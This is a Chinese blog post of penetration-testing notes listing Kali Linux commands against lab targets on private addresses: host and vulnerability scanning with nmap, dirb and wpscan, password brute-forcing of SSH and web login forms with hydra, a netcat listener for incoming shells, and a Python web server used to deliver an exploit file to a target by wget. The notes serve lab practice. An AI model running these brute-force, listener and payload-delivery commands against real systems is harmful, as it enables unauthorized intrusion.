kali常见工具嗅探参数集合

最新推荐文章于 2024-06-14 09:32:35 发布
最新推荐文章于 2024-06-14 09:32:35 发布
阅读量73 收藏
点赞数
文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61611948/article/details/134995664
版权

扫描:
netdiscover -i eth1 -r 192.168.10.0/24 

nmap --script=auth 192.168.10.140 -v -sV      auth  健权类验证脚本

nmap --script=vuln 192.168.10.140 -v -sV

dirseach -url 192.168.10.140

whatweb -v 192.168.79.131

dirb http://192.168.10.140:8011   

##curl http://192.168.10.140/index.html.bak   这个命令可以直接显示文件里面的内容

wpscan --url http://192.168.10.140/wordpress     -e  u   用户名的枚举  

寻找Linux里面以.bak结尾的备份文件
dirb http://192.168.10.140 -X .bak  

爆破:
nmap 192.168.10.140 -v --script=brute -p22 
-l是指了用户guest     -P是字典
hydra -l guest -P mima.txt ssh://192.168.10.141 -f -vV -o hydra.ssh

wpscan --url http://wordy  -P wordypasswd.txt -U  wordyuser.txt

hydra -l admin -P /usr/share/john/password.lst 192.168.75.148 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -f

hydra -L /path/to/usernames.txt -P /path/to/passwords.txt http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username"
监听:
nc -lvvp 4444 

这个命令将在当前目录启动一个简单的HTTP服务器,监听端口号5555。这样,你就可以在靶机上使用wget命令下载文件
python -m http.server  5555
wget http://192.168.10.140:5555/15285.c(15285.c是文件)


ssh连接靶机:(22/tcp-ssh端口服务)
sh guest@192.168.10.141

VST-Forever-zx
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
kali视频学习笔记
cj1064789374的博客
08-29 2812
kali学习笔记
弱口令审计-工具用法大全
anquanniu的博客
09-11 1911
目前,帐号仍然是最主要的用户身份认证方式,但由于安全意识的淡漠,很多人仍在使用弱口令。而一旦泄漏,所有安全防范机制都将形同虚设。 本课程《用户口令审计》是『Kali Linux工具大全』技术系列的第5部分。向大家详述Kali Linux中全部在线/离线弱口令审计工具的用法,以此来帮助大家提前发现自己系统中的弱口令问题。 用户口令审计工具介绍 1、crunch 在面对妥善保护的系统时,我们可能很难发现其漏洞和可渗透的突破口。作为渗透测试人员,此时应尝试对目标系统进行弱密码的检测。密码破解成败的关键在于字典的
kali linux 工具
04-20
kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali l
kali工具整理
ordar123的博客
04-02 4918
信息收集 Maltego Maltego社会工程学信息收集工具。作为一款成功的信息收集工具其功能强大,它不仅可以自动收集到所需信息,而且可以将收集的信息可视化,用一种图像化的方式将结果呈现给我们。 参考:http://www.360doc.com/content/18/0725/01/11935121_772997434.shtml https://www.freebuf.com/sectool/...
Kalikali主要工具使用说明(文末附超全思维导图)
PP_zi的博客
05-11 3万+
本文为《从实践中学习Kali Linux渗透测试》总结笔记,仅供学习使用,禁止用于非法用途,转载请附上原文链接! 1. 信息收集 1.1 发现主机 traceroute 获取目标主机的路由条目,确定网络拓扑。每一跳表示一个网关,星号可能为防火墙导致。 1.1.1 扫描主机 ① nmap nmap -sP ip/ip段 对目标主机实施ping扫描,测主机是否在线 也可以通过其他语法,扫描主机开放端口、使用的操作系统等 ② Netdiscover ARP侦查工具,可以扫描IP地址,检查在线主机。 .
Kali linux学习入门-Kali菜单中各工具功能
成功路上的奋青者
10-15 2163
想要进入安全行业为安全事业做贡献,就要硬着头皮学点什么。就像为什么军人往往都有更高的成就?因为自律。克服玩游戏的欲望吧,踏踏实实学点东西。Kali Linux工具清单Kali Linux综合包kali-linuxburpsuitehydrajohnmaltegonmapsqlmapwiresharkzaproxy。
网络安全必备:Kali 中扫描器和爆破工具的选用与实践_kali扫描网段(1)
2401_84297265的博客
05-04 1135
本文仅用于的学习,请遵守相关法律法规,严禁用于非法途径。若观众因此作出任何危害网络安全的行为,后果自负,与本人无关。
网络安全必备:Kali 中扫描器和爆破工具的选用与实践
weixin_43263566的博客
12-28 3573
kail - 扫描与爆破
Kali Linux Web 渗透测试秘籍 第一章 配置 Kali Linux
热门推荐
龙哥盟
10-14 5万+
第一章 配置 Kali Linux 作者:Gilberto Najera-Gutierrez 译者:飞龙 协议:CC BY-NC-SA 4.0 简介在第一章中,我们会涉及如何准备我们的 Kali 以便能够遵循这本书中的秘籍,并使用虚拟机建立带有存在漏洞的 Web 应用的实验室。1.1 升级和更新 Kali在我们开始 Web 应用安全测试之前,我们需要确保我们拥有所有必要的最新
Kali局域网和断网拦截
08-31
Kali Linux 中,我们可以使用各种工具和拦截局域网中的流量。下面我们将介绍如何使用 Kali Linux 实现局域网和断网拦截。 一、获取本机 IP 和网卡信息 在开始和拦截之前,我们需要先获取本机的 ...
kali工具使用.pdf
09-14
kali工具使用.pdf
kali系统-工具-中文手册-html版
07-15
Kali Linux Tools 中文說明書 nmap包说明 NMAP(“网络映射”)是一个自由和开放源码(许可证)工具进行网络发现和安全审计。许多系统和网络管理员也觉得有用,如网络库存,管理服务升级计划和监控主机或服务的正常...
kalitools:Kali Linux工具清单
02-03
kalitools:Kali Linux工具清单
等保测评和安全运维
weixin_64392888的博客
06-11 624
通过将等保测评的标准和流程融入日常的安全运维工作中,企业可以更有效地识别和应对网络安全威胁,构建起一个全面、动态的网络安全防护体系。为了应对这些挑战,企业不仅要实施有效的安全运维措施,还需要通过等保测评确保其信息系统符合国家的安全标准。等保测评提供了一套标准化的安全要求,安全运维团队可以根据这些要求,实施相应的安全措施,如加强访问控制、数据加密、网络安全防护等。通过等保测评,企业可以识别信息系统的安全风险,并根据测评结果制定或调整安全策略,确保安全措施与企业的实际需求相匹配。
《软件定义安全》之六:SDN和NFV安全实践
大龄IT民工
06-11 1280
DDoS检测清洗应用ADS APP的设计思路:借助安全控制平台中流相关的组件,从SDN控制器中获得相应的流量,并根据抗DDoS应用订阅的恶意流特征进行检测,发现恶意流量后,应用可根据细粒度的检测判断是否出现恶意攻击。如是,则下发实时清洗的流指令,即可将恶意流量牵引到清洗设备ADS上。过程如下:➊注册。启动阶段,ADS设备和ADS APP均向安全控制平台注册,提供自己的基本信息,如类型、位置和能力等。➋订阅。为获取并检查可疑流,ADS APP向安全控制器发送订阅。➌流统计获取和检查。
如何确保数据跨域交换安全、合规、可追溯性?
最新发布
文件数据安全交换
06-14 221
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 944
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
安全漏洞扫描工具
weixin_45639224的博客
06-05 683
安全漏洞扫描工具
kali linux snort
05-12
Kali Linux中,可以使用Snort来进行和检测网络流量中的异常行为。具体而言,使用Snort需要进行以下步骤: 1. 安装Snort:可以在终端中使用命令进行安装。 2. 配置Snort:需要对Snort的配置文件进行相应的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值